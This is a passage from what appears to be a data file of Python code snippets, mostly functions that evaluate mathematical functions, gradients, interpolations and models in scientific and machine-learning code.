np.zeros(grid.shape)", "def __call__ ( self , func , x , h , der = False ) :\n\n ## calculate differences \n imax = self.__order + 2 if der else self.__order + 1\n i = 0\n while i < imax : \n j = i + 1\n self.__df[i] = func ( x + j * h ) - func ( x - j * h )\n i += 1\n \n ## 1) calculate 1st derivative \n result = dot_fma ( self.__order + 1 , self.__df , self.__d1 ) / ( self.__sf1 * h ) \n if not der : return result \n \n ## 2) calculate Nth derivative \n dd = dot_fma ( self.__order + 2 , self.__df , self.__d2 ) / ( self.__sf2 * h**(self.__order*2+3) ) \n \n return result, dd", "def run_grid(tb_data, dsp_config, grid, fom_function, dtype=np.float64, db_dict=None, verbosity=0):\n\n grid_values = np.ndarray(shape=grid.get_shape(), dtype=dtype)\n iii = grid.get_zero_indices()\n 
if verbosity > 0: print(\"Starting grid calculations...\")\n while True: \n grid.set_dsp_pars(dsp_config, iii)\n if verbosity > 1: pprint(dsp_config)\n if verbosity > 0: grid.print_data(iii)\n grid_values[tuple(iii)] = run_one_dsp(\n tb_data, dsp_config, db_dict=db_dict, fom_function=fom_function, verbosity=verbosity)\n if verbosity > 0: print('Value:', grid_values[tuple(iii)])\n if not grid.iterate_indices(iii): break\n return grid_values", "def _evaluate(self, x, y, z):\n if _isscalar(x):\n x_pos = max(min(self.xSearchFunc(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(self.ySearchFunc(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(self.zSearchFunc(self.z_list, z), self.z_n - 1), 1)\n else:\n x_pos = self.xSearchFunc(self.x_list, x)\n x_pos[x_pos < 1] = 1\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = self.ySearchFunc(self.y_list, y)\n y_pos[y_pos < 1] = 1\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n z_pos = self.zSearchFunc(self.z_list, z)\n z_pos[z_pos < 1] = 1\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n gamma = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.f_values[x_pos - 1, y_pos - 1, z_pos - 1]\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.f_values[x_pos - 1, y_pos - 1, z_pos]\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.f_values[x_pos - 1, y_pos, z_pos - 1]\n + (1 - alpha) * beta * gamma * self.f_values[x_pos - 1, y_pos, z_pos]\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.f_values[x_pos, y_pos - 1, z_pos - 1]\n + alpha * (1 - beta) * gamma * self.f_values[x_pos, y_pos - 1, z_pos]\n + alpha * beta * (1 - gamma) * self.f_values[x_pos, y_pos, z_pos - 1]\n + alpha * beta * gamma * self.f_values[x_pos, y_pos, z_pos]\n )\n return f", "def _evaluate(self, X, Y):\n # evaluate all networks\n #\n # evaluations = torch.zeros(self.population_size, device=self.device)\n evaluations = torch.zeros(self.population_size, device=self.device)\n\n for i in range(self.population_size):\n selected_pheno = self.population[i].cpu()\n # if IDCT is to be used first transform the vector, then use it to assemble the network\n if self.IDCT_from is not None:\n selected_pheno = torch.tensor(\n fftpack.idct(np.array(selected_pheno), n=self.model.total_parameters(), norm=\"ortho\"))\n fill_weights(self.model, selected_pheno.to(self.device))\n # evaluate\n predicted = self.model.forward(X)\n evaluations[i] = self.loss_function(predicted, Y)\n return evaluations", "def _evalfunc_nonlin(self, ai_patch, apr_points, elts=None):\n # loop over fields involved in the function\n# li_nfields = len(self.func_arguments)\n# print \"li_nfields=\", li_nfields\n\n list_values_F = []\n for F in self.func_arguments:\n list_val = F.eval(ai_patch, elts)\n# print \"argfunc id : \", F.id\n# print \"argfunc coefs : \", F.get()\n# print \"eval on grids \", list_val\n\n list_values_F.append(list_val)\n\n # TODO to change when passed to ndof > 1\n lpr_val = self.func(list_values_F, apr_points)\n# print \"current Field : \", self.id\n# print \"lpr_val=\", lpr_val\n# print \"lpr_val.shape = \", lpr_val.shape\n return lpr_val", "def eval_numerical_gradient(f, x, verbose = True, h = 0.00001):\n fx = f(x) # evaluate function value at original point\n grad = np.zeros_like(x) # iterate over all indexese in x\n it = np.nditer(x, 
flags = ['multi_index'], op_flags = ['readwrite'])\n while not it.finished:\n # evaluate function at x+h\n ix = it.multi_index\n oldval = x[ix]\n x[ix] = oldval + h # increment by h\n fxph = f(x) # evaluate f(x+h)\n x[ix] = oldval - h\n fxmh = f(x) # evaluate f(x-h)\n x[ix] = oldval # restore\n \n #compute the partial derivative with centered fromula.\n grad[ix] = (fxph - fxmh) / (2 * h)\n if verbose:\n print(ix, grad[ix])\n it.iternext()\n return grad", "def EvaluateFunction(self, p_float=..., p_float=..., p_float=...):\n ...", "def test_independent_expval(self, execute_kwargs):\n dev = qml.device(\"default.qubit\", wires=2)\n params = jax.numpy.array([0.1, 0.2, 0.3])\n\n def cost(a, cache):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.RY(a[2], wires=0)\n qml.expval(qml.PauliZ(1))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n res = qml.interfaces.execute([tape], dev, cache=cache, **execute_kwargs)\n return res[0]\n\n res = jax.jit(jax.grad(cost), static_argnums=1)(params, cache=None)\n assert res.shape == (3,)", "def grid_evaluation(self, x, y, size=256):\n\t\t# Create matrix x and y coordinates\n\t\tL = self.L\n\t\t[xx, yy] = meshgrid(linspace(-L, L, size), linspace(-L, L, size))\n\t\tpts = np.array([xx, yy])\n\t\tux = batch_eval(x, pts)\n\t\tuy = batch_eval(y, pts)\n\t\treturn xx, yy, ux, uy", "def test_independent_expval(self, execute_kwargs):\n dev = qml.device(\"default.qubit\", wires=2)\n params = jax.numpy.array([0.1, 0.2, 0.3])\n\n def cost(a, cache):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.RY(a[2], wires=0)\n qml.expval(qml.PauliZ(1))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n res = execute([tape], dev, cache=cache, **execute_kwargs)\n return res[0]\n\n res = jax.jit(jax.grad(cost), static_argnums=1)(params, cache=None)\n assert res.shape == (3,)", "def function(self, variables, exprs, mode=None, explicit_pars=False,\n givens=None,\n on_unused_input='raise', numpy_result=False):\n if mode is None:\n if getattr(self, 'mode', None) is None:\n mode = theano.config.mode\n else:\n mode = self.mode\n\n # Get variables and expressions into a canonical form first that is\n # assumed below.\n variables = [self._lookup(self.exprs, i) for i in variables]\n\n if not isinstance(exprs, list):\n # We memorize whether exprs originall was a list. If it was, we\n # need to undo this later for the returned function.\n exprs_not_list = True\n exprs = [exprs]\n else:\n exprs_not_list = False\n exprs = [self._lookup(self.exprs, i) for i in exprs]\n\n # We need to clone instead of using the givens parameter of\n # theano.function, because otherwise we might get a theano error\n # with conflicting replacements. (See theano/compile/pfunc.py:162,\n # rebuild_collect_shared.)\n if givens is not None:\n exprs = [theano.clone(e, givens) for e in exprs]\n else:\n givens = {}\n\n # Build update dictionary.\n updates = collections.defaultdict(lambda: {})\n if isinstance(exprs, (list, tuple)):\n for expr in exprs:\n if isinstance(expr, list):\n expr = tuple(expr)\n\n # TODO: last takes all, maybe should throw an error.\n updates.update(self.updates[expr])\n else:\n updates.update(self.updates[exprs])\n\n if GPU:\n # This is a workaround for theano issue #1467. After cloning a\n # graph with random state in it, the cloning will not make the\n # random state reference the new substitutions but instead have\n # references to the old variables. 
The workaround is to silently\n # add these variables to the givens parameter, and substitute them\n # with their new references.\n outputs = not numpy_result\n old_variables, old_exprs = variables, exprs\n variables, exprs = self.var_exp_for_gpu(\n variables, exprs, outputs=outputs)\n more_givens = [(old, new) for old, new\n in zip(old_variables, variables)\n if any(tell_variable_in_expr(old, e) for e in exprs)]\n givens.update(dict(more_givens))\n\n variables = [self.parameters.flat] + variables\n\n f = theano.function(\n variables,\n exprs[0] if exprs_not_list else exprs,\n givens=givens, mode=mode,\n on_unused_input=on_unused_input, updates=updates)\n\n if GPU:\n f = gnumpy_func_wrap(f)\n\n if not explicit_pars:\n def f_implicit_pars(*args, **kwargs):\n return f(self.parameters.data, *args, **kwargs)\n f_implicit_pars.theano_func = f\n f_implicit_pars.breze_func = True\n return f_implicit_pars\n\n else:\n f.breze_func = True\n return f", "def evaluate(self, batch: RecordBatch) -> Any:\n processed_args = self._process_arguments(self._arguments, batch)\n if self._function:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=RuntimeWarning)\n if self._is_binary_func:\n result = self._apply_binary_args_function(\n *processed_args\n )\n else:\n result = self._function(*processed_args)\n else:\n result = self._expr_kernel(processed_args, batch)\n\n return self._post_process_result(result)", "def f(self, eval_grid, index_data):\n\n # Make sure we have 2-d arrays throughout.\n if len(eval_grid.shape) == 1:\n eval_grid = np.reshape(eval_grid, (len(eval_grid), 1))\n elif len(eval_grid.shape) > 2:\n raise ValueError(eval_grid.shape)\n if len(index_data.shape) == 1:\n index_data = np.reshape(index_data, (len(index_data), 1))\n elif len(index_data.shape) > 2:\n raise ValueError(index_data.shape)\n\n return self.f_s(\n index=eval_grid,\n index_s=index_data,\n leave_one_out_locs=np.array([], dtype=np.int64),\n other_locs=np.arange(len(eval_grid))\n )", "def eval_numerical_gradient(f, x, verbose=True, h=0.00001):\n\n fx = f(x) # evaluate function value at original point\n grad = np.zeros_like(x)\n # iterate over all indexes in x\n it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])\n while not it.finished:\n\n # evaluate function at x+h\n ix = it.multi_index\n oldval = x[ix]\n x[ix] = oldval + h # increment by h\n fxph = f(x) # evalute f(x + h)\n x[ix] = oldval - h\n fxmh = f(x) # evaluate f(x - h)\n x[ix] = oldval # restore\n\n # compute the partial derivative with centered formula\n grad[ix] = (fxph - fxmh) / (2 * h) # the slope\n if verbose:\n print(ix, grad[ix])\n it.iternext() # step to next dimension\n\n return grad", "def eval(self, df):\n ## Check invariant; model inputs must be subset of df columns\n if not set(self.var).issubset(set(df.columns)):\n raise ValueError(\n \"Model function `{}` var not a subset of given columns\".format(\n self.name\n )\n )\n\n ## Set up output\n n_rows = df.shape[0]\n results = zeros((n_rows, len(self.out)))\n\n for ind in range(n_rows):\n results[ind] = self.func(*df.loc[ind, self.var])\n\n ## Package output as DataFrame\n return DataFrame(data=results, columns=self.out)", "def _evaluate(self, x, y, z):\n if _isscalar(x):\n f = self.compare([f(x, y, z) for f in self.functions])\n else:\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y, z)\n f = self.compare(temp, axis=1)\n return f", "def __init__(self, f, N_elements, C, D, analytical, 
grid_points):\n\n\n\n self.Ne = N_elements\n self.gp = grid_points\n self.C = C\n self.D = D\n self.f = lambda x: f(x)\n self.tol = 10e-4\n self.x = sym.Symbol(\"x\")\n\n self.h = 1/(2*self.Ne)\n self.global_matrix = np.zeros([2*self.Ne, 2*self.Ne])\n self.global_vector = np.zeros([2*self.Ne])\n self.psi = sym.zeros(3*self.Ne,1)\n\n self.analytical = lambda x,C,D: analytical(x,C,D)\n\n self.x_values = np.linspace(0,1,self.gp)", "def compute(self, *args, **kwargs):\n for node in self.evaluation_sequence:\n node.evaluate()", "def __call__ ( self , args , cov2 = None ) :\n \n n = self.N \n assert len ( args ) == n , 'Invalid argument size'\n\n ## get value of the function \n val = float ( self.func ( *args ) ) \n \n ## no covariance matrix is specified ?\n if not cov2 : return val\n \n c2 = 0\n g = n * [ 0 ] ## gradient \n \n for i in range ( n ) :\n\n di = self.partial[i] ( *args )\n if iszero ( di ) : continue\n \n g [i] = di \n\n cii = self.__cov2 ( cov2 , i , i )\n c2 += di * di * cii\n \n for j in range ( i ) : \n\n dj = g [ j ]\n if iszero ( dj ) : continue\n \n cij = self.__cov2 ( cov2 , i , j ) \n c2 += 2 * di * dj * cij \n\n return VE ( val , c2 )", "def evaluate(self, batch_x, batch_y):\n raise NotImplementedError()", "def _evaluate(self, x, y, z):\n raise NotImplementedError()", "def eval_numerical_gradient(f,x):\n\n\tgrad = np.zeros(x.shape)\n\th = 0.0001\n\n\t# iterate over all indexes in x\n\tit = np.nditer(x, flag = ['multi_index'], op_flags = ['readwrite'])\n\n\twhile not it.finished:\n\t\tix = it.multi_index\n\t\told_value = x[ix]\n\n\t\tx[ix] = old_value + h\n\t\tfxh_left = f(x)\n\n\t\tx[ix] = old_value - h\n\t\tfxh_right = f(x)\n\n\t\tx[ix] = old_value\n\n\t\t# compute the partial derivative\n\t\tgrad[ix] = (fxh_left - fxh_right) / (2 * h)\n\t\tit.iterate()\n\n\treturn grad", "def evaluate(self, g):\n pass", "def evaluate_function(self, indices, y_measured=None):\n indices = [indices] if not self.batch_update else indices\n if self.simulate_measurement:\n for idx in indices:\n self.y_sparse[tuple(idx)] = self.y_true[tuple(idx)]\n elif y_measured is not None:\n for idx in indices:\n self.y_sparse[tuple(idx)] = y_measured[tuple(idx)]\n else:\n for idx in indices:\n if self.extent is not None:\n _idx = []\n for i, e in zip(idx, self.extent):\n _idx.append(i + e[0])\n _idx = tuple(_idx)\n else:\n _idx = tuple(idx)\n self.y_sparse[tuple(idx)] = self.target_function(_idx)\n self.X_sparse = gprutils.get_sparse_grid(self.y_sparse, self.extent)\n self.target_func_vals.append(self.y_sparse.copy())\n return", "def compute(self, event=None, zs=None, thetas=None, nhats=None):\n\n\n if self.strassen:\n return self._strassen_compute(event, zs, thetas)\n else:\n return self._efp_compute(event, zs, thetas, nhats)", "def _evaluate(self, x, y):\n if _isscalar(x):\n x_pos = max(min(self.xSearchFunc(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(self.ySearchFunc(self.y_list, y), self.y_n - 1), 1)\n else:\n x_pos = self.xSearchFunc(self.x_list, x)\n x_pos[x_pos < 1] = 1\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = self.ySearchFunc(self.y_list, y)\n y_pos[y_pos < 1] = 1\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n f = (\n (1 - alpha) * (1 - beta) * self.f_values[x_pos - 1, y_pos - 1]\n + (1 - alpha) * beta * self.f_values[x_pos - 1, y_pos]\n + alpha * (1 - beta) * self.f_values[x_pos, y_pos - 1]\n 
+ alpha * beta * self.f_values[x_pos, y_pos]\n )\n return f", "def compute_integrals(self):\n\n integrals = self.dat.data.reshape(-1, self.nvdofs).T.dot(self.cell_volumes)\n integrals_lift = Function(self._function_space)\n integrals_lift.dat.data[:] = np.tile(integrals,(self.nhdofs,))\n\n return integrals_lift", "def evaluate_shape_derivatives(self, locations, elements=None):\n # points = np.zeros((5, 4, self.n_cells, 3))\n # points[:, :, even_mask, :] = nodes[:, even_mask, :][self.tetra_mask_even, :, :]\n # points[:, :, ~even_mask, :] = nodes[:, ~even_mask, :][self.tetra_mask, :, :]\n\n # # changing order to points, tetra, nodes, coord\n # points = points.swapaxes(0, 2)\n # points = points.swapaxes(1, 2)\n if elements is None:\n elements = np.arange(0, self.n_elements, dtype=int)\n ps = self.nodes[\n self.elements, :\n ] # points.reshape(points.shape[0] * points.shape[1], points.shape[2], points.shape[3])\n # vertices = self.nodes[self.elements[col,:]]\n m = np.array(\n [\n [\n (ps[:, 1, 0] - ps[:, 0, 0]),\n (ps[:, 1, 1] - ps[:, 0, 1]),\n (ps[:, 1, 2] - ps[:, 0, 2]),\n ],\n [\n (ps[:, 2, 0] - ps[:, 0, 0]),\n (ps[:, 2, 1] - ps[:, 0, 1]),\n (ps[:, 2, 2] - ps[:, 0, 2]),\n ],\n [\n (ps[:, 3, 0] - ps[:, 0, 0]),\n (ps[:, 3, 1] - ps[:, 0, 1]),\n (ps[:, 3, 2] - ps[:, 0, 2]),\n ],\n ]\n )\n I = np.array(\n [[-1.0, 1.0, 0.0, 0.0], [-1.0, 0.0, 1.0, 0.0], [-1.0, 0.0, 0.0, 1.0]]\n )\n m = np.swapaxes(m, 0, 2)\n element_gradients = np.linalg.inv(m)\n\n element_gradients = element_gradients.swapaxes(1, 2)\n element_gradients = element_gradients @ I\n\n return element_gradients[elements, :, :], elements", "def evaluate(self, g):\n raise NotImplementedError", "def test_applyFunction(self):\n\n ptwise_linear = XYs1d(axes=XYs1d.defaultAxes(labelsUnits={\n XYs1dModule.yAxisIndex: ('crossSection', 'b'),\n XYs1dModule.xAxisIndex: ('energy_in', 'eV')}), data=[[1e-5, 1.0], [20.0e6, 21.0]])\n\n self.assertAlmostEqual(ptwise_linear.evaluate(15.0e6), 16.0)\n# self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-x), None).evaluate(15.0e6), math.exp(-16.0)) # This should work, but fails\n self.assertAlmostEqual(ptwise_linear.evaluate(1.0e6), 2.0)\n# self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-x), None).evaluate(1.0e6), math.exp(-2.0)) # This should work, but fails\n self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-ptwise_linear.evaluate(x)), None).evaluate(1.0e6), math.exp(-2.0), 3) # This should absolutely fail and is the wrong way to do it", "def _evaluate(self,d_repr, chain_state):\n results = iter(self.function(**chain_state))\n if self.derivative_vars:\n return results.next(), d_repr(1, self.derivative_order, results)\n else :\n return results.next()", "def differential_evolution(f, D_dimension, N_samples, min_bound, max_bound):\n #Multidimensional of D dimensions\n #in our case D= 3 for CIR Model\n \n Min_Bound = min_bound\n Max_Bound = max_bound\n \n #restrict the space to only positive doubles in (0,1)\n D = D_dimension\n N = N_samples*D\n #N=5\n \n CR = 0.9 #[0,1]\n F = 0.8 #(0,2)\n \n #generate N points\n generation_ = 0\n matrix = np.random.random((D,N))*Max_Bound\n \n full_list = np.arange(N)\n collecting_fitness_scores = np.zeros(N)\n while generation_ < 200:\n \n #print \"\\nAt Generation {}\".format(generation_)\n \n for i in range(matrix.shape[1]): #going across columns...N \n \n #print \"at column {}\".format(i)\n \n #randomly pick 3 indices from the subset list\n new_list = np.delete(full_list,i)\n x1,x2,x3 = 
np.random.choice(new_list,3)\n \n #Mutation Stage\n V = matrix[:,x1] + F * (matrix[:,x2] - matrix[:,x3]) #check bounds here\n V = checkBounds(V,Min_Bound,Max_Bound)\n \n \n U = np.zeros(len(V)) #make trial vector\n random_choice = np.random.choice(D)\n #Recombination Stage (Crossover) Forming Trial Vector\n for j in range(len(V)):\n s = np.random.uniform() #draw random uniform number in [0,1]\n if (s <= CR) or (j == random_choice): #if s <= CR then crossover\n U[j] = V[j]\n else:\n U[j] = matrix[j,i]\n #U[0] = V[0] #definite crossover\n \n# #Comparing Fitness Scores\n# fitness_trial_vec = f(U)\n# fitness_original = f(matrix[:,i]) \n# if fitness_trial_vec <= fitness_original:\n# matrix[:,i] = U\n# collecting_fitness_scores[i] = fitness_trial_vec\n# else:\n# collecting_fitness_scores[i] = fitness_original\n \n x1_satisfied = checkConditions(U)\n x2_satisfied = checkConditions(matrix[:,i])\n \n fitness_trial_vec = f(U)\n fitness_original = f(matrix[:,i])\n \n \n if x1_satisfied and x2_satisfied:\n if fitness_trial_vec < fitness_original:\n matrix[:,i] = U\n collecting_fitness_scores[i] = fitness_trial_vec\n else:\n collecting_fitness_scores[i] = fitness_original\n elif (x1_satisfied == True) and (x2_satisfied == False):\n matrix[:,i] = U\n collecting_fitness_scores[i] = fitness_trial_vec\n elif (x1_satisfied == False) and (x2_satisfied == True):\n collecting_fitness_scores[i] = fitness_original\n else:\n if fitness_trial_vec < fitness_original:\n matrix[:,i] = U\n collecting_fitness_scores[i] = fitness_trial_vec\n else:\n collecting_fitness_scores[i] = fitness_original\n \n \n \n #print collecting_fitness_scores\n \n \n generation_ += 1\n \n print \"smallest fitness score: {}\".format(np.min(collecting_fitness_scores))\n smallest = matrix[:,np.argmin(collecting_fitness_scores)]\n print \"smallest: {}\".format(smallest)\n \n return smallest", "def _efp_compute(self, event, zs, thetas, nhats):\n\n return self.efpset.compute(event, zs, thetas, nhats)", "def eval_grads(self, data):\n drho = np.zeros_like(self.rhos)\n dW = np.zeros_like(self.W)\n da = np.zeros_like(self.a)\n dc = np.zeros_like(self.c)\n dba = np.zeros_like(self.bs['alpha'])\n dVa = np.zeros_like(self.Vs['alpha'])\n dbm = np.zeros_like(self.bs['mu'])\n dVm = np.zeros_like(self.Vs['mu'])\n dbs = np.zeros_like(self.bs['sigma'])\n dVs = np.zeros_like(self.Vs['sigma'])\n\n const = 0.5 * np.log(2. * np.pi)\n for i in range(self.Ndim - 1, -1, -1):\n a = self.rhos[i] * self.a[i]\n h = 0.5 * (a + np.abs(a)) # ReLU\n dlt = (data[:, i][:, None] - self.mus[i][None, :])\n dlt /= self.sigmas[i][None, :]\n dlt = np.mean(dlt, axis=0)\n phi = 0.5 * dlt ** 2. - np.log(self.sigmas[i]) - const\n pi = self.alphas[i] * phi\n pi /= np.mean(pi)\n dza = pi - self.alphas[i]\n dba[i] = dza\n dVa[i] = dza[None, :] * h[:, None]\n dzm = pi * dlt\n dzm *= self.slow_factor # apparently this is a `tight' component\n dbm[i] = dzm\n dVm[i] = dzm[None, :] * h[:, None]\n dzs = pi * (dlt ** 2. - 1)\n dbs[i] = dzs\n dVs[i] = dzs[None, :] * h[:, None]\n\n # dh has shape Nhidden x Ncomponents (?)\n dh = dza * dVa[i] + dzm * dVm[i] + dzs * dVs[i]\n dpsi = 1. 
* (dh > 0)\n\n # collapse to a scalar or vector of Nhidden?\n drho[i] = np.mean(dpsi)\n\n if i == 0:\n dc = da[i]\n else:\n da[i - 1] = da[i] + np.mean(dpsi * self.rhos[i], axis=1)\n dW[:, i] = np.mean(da[i - 1][:, None] * data[:, i][None, :],\n axis=1)\n self.a[i - 1] = self.a[i] - np.mean(data[:, i][None, :] *\n self.W[:, i][:, None],\n axis=1)\n\n return -drho, -dc, -dW, -dba, -dVa, -dbm, -dVm, -dbs, -dVs", "def evaluate_functional(x, functional, solution, functionals={}, params={}):\n\n functional = eval_expr(functional, functionals, params)\n\n undefined = functional.free_symbols - set(x)\n if undefined:\n raise ValueError(\n f\"Functional contains symbols with undefined values: {undefined}\"\n )\n\n code = _generate_code(x, functional)\n # print(code)\n ldict = {}\n exec(code, globals(), ldict)\n evaluate = ldict[\"evaluate\"]\n del code, ldict\n\n K = len(solution)\n values = numpy.empty(K, dtype=float)\n evaluate(values, solution)\n return values", "def eval(self, df):\n df_res = self.func(df)\n return df_res[self.out]", "def run(self):\n\t\tcurX = self.x0\n\t\tcurY = self.func.evalAt(curX)\n\t\tcurT = self.T0\n\t\tfor i in range(1, self.iters + 1):\n\t\t\tif curT == 0:\n\t\t\t\tbreak\n\t\t\tnX = self.newStateFunc(curX)\n\t\t\tnY = self.func.evalAt(nX)\n\t\t\tif nY <= curY or self.acceptanceFunc(nY - curY, curT) > random.random(): # accept if lower energy or probability check passes\n\t\t\t\tcurX = nX\n\t\t\t\tcurY = nY \n\t\t\tcurT = self.coolingFunc(self.T0, i)\t\n\t\treturn (curX, curY)", "def _evaluate(self, w, x, y, z):\n raise NotImplementedError()", "def test_gradable_funcs(self):\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = None", "def _evaluate_fitness(self, population: Population):\n for n, individual in enumerate(population.individuals):\n\n # Dataset extraction using individual features\n X_data = self._create_dataset(individual, self._X)\n\n # Get scores for each fitness strategy (each objective)\n scores = [fitness_func.eval_fitness(X=X_data, y=self._y, num_feats=len(population.features))\n for fitness_func in self.fitness]\n\n # If the number of features is an objective\n if self.optimize_features:\n scores.append(self.features_function(individual=individual,\n total_feats=len(self._population.features)))\n\n # Create a solution\n individual.fitness = Solution(scores)\n\n return population", "def evaluate(self,var,g=None):\n if (g==None):g=self.g\n assert(len(var)==self.n)\n res=np.zeros(self.n+1)\n for i in range(self.n):\n res[i]=var[i]**2+2.*var[i]-self.N*(self.n-self.N)*g**2*self.gamma-g*np.sum([self.XXZ.Z(i,j)*(var[i]-var[j]) for j in range(self.n) if j!=i])\n res[self.n]=np.sum(var)+2.*self.N\n return res", "def evaluate():\n model.eval()\n with torch.no_grad():\n loss, 
n = 0, 0\n for xb, yb in valid_dl:\n n += len(xb)\n loss += loss_func(model(xb), yb) * len(xb)\n\n return loss/n", "def evaluate(self, *args, **kwargs):\n params = self.process_args(args, kwargs)\n a = params['a']\n b = params['b']\n return a * self.x + b", "def evaluate(bounds , func):\n if len(bounds) != 2:\n raise ValueError(\"Bounds should contain 2 elements, found %d.\" % len(bounds))\n\n a = bounds[0]\n b = bounds[1]\n ya = func(a)\n yb = func((a+b)/2.)\n yc = func(b)\n I = (b-a) * (ya + 4. * yb + yc) / 6.\n return I", "def compute_gradients(self, f, args, grad_ys=None):\n if tf.executing_eagerly():\n grad_fn = tf.contrib.eager.gradients_function(f)\n if grad_ys is not None:\n grads = grad_fn(*args, dy=grad_ys)\n else:\n grads = grad_fn(*args)\n else:\n res = f(*args)\n grads = tf.gradients(res, args, grad_ys=grad_ys)\n return self.evaluate(grads)", "def compute_gradient(self, function, arguments):", "def iterate_run(self, rho: float, **kwargs):\r\n # TODO extend to non mono-dimensional variables\r\n\r\n # build local problem\r\n x_i = Variable(self.x_shape[0])\r\n\r\n penalties = [(x_i - self.z_neigh[j])@(x_i - self.z_neigh[j]) for j in self.agent.in_neighbors]\r\n penalties.append((x_i - self.z)@(x_i - self.z))\r\n sumlambda = sum(self.lambd.values())\r\n\r\n obj_function = self.agent.problem.objective_function + sumlambda @ x_i + (rho/2) * sum(penalties)\r\n pb = Problem(obj_function, self.agent.problem.constraints)\r\n\r\n # solve problem and save data\r\n x = pb.solve()\r\n\r\n # exchange primal variables and dual variables with neighbors\r\n x_neigh = self.agent.neighbors_exchange(x)\r\n lambda_neigh = self.agent.neighbors_exchange(self.lambd, dict_neigh=True)\r\n\r\n # compute auxiliary variable\r\n z = (sum(x_neigh.values()) + x) / (self.degree+1) + \\\r\n (sum(lambda_neigh.values()) + self.lambd[self.agent.id]) / (rho*(self.degree+1))\r\n\r\n # exchange auxiliary variables with neighbors\r\n z_neigh = self.agent.neighbors_exchange(z)\r\n\r\n # update local data\r\n self._update_local_solution(x, z, z_neigh, rho, **kwargs)", "def calculate_numerical_solution(self):\n\n self.u = np.vectorize(self.u)\n self.numerical = np.zeros(self.gp) #Store value of u(x) in each gridpoint\n\n\n #Calculate special case of element 0\n L = 0\n R = 2*self.h\n end = np.where((np.abs(self.x_values - R)<=self.tol))[0][0]\n end += 1\n x = self.x_values[L:end]\n self.numerical[L:end] = self.u(x,0,0)\n temp = 1 #Starts as 1 since the 0th element is calculated outside the loop\n\n #Calculate value of u(x) in each element.\n for i in range(2,2*self.Ne,2):\n\n L = i* self.h\n R = L + 2*self.h\n\n #Find idices in x array to define element start/end\n start = np.where((np.abs(self.x_values - L)<=self.tol))[0][0]\n end = np.where((np.abs(self.x_values - R)<=self.tol))[0][0]\n\n #We want to find L < X <= R, except from first element where we want to include L=0.\n start += 1\n end += 1\n x = self.x_values[start:end]\n self.numerical[start:end] = self.u(x,i,temp)\n\n temp+=1", "def evaluate(\n config,\n _,\n pstate,\n eval_ds,\n rng,\n unused_num_eval_steps = -1,\n):\n logging.info(\"Starting evaluation.\")\n eval_metrics = None\n state = flax_utils.unreplicate(pstate)\n\n render_loop = instant_ngp_utils.make_render_loop(state.params, config)\n with utils.StepTraceContextHelper(\"eval\", 0) as trace_context:\n for step, batch in enumerate(eval_ds): # pytype: disable=wrong-arg-types\n data = jax.tree_map(jnp.asarray, batch)\n render_poses = data[\"c2w\"]\n hwf = data[\"hwf\"]\n rng = jax.random.fold_in(rng, 
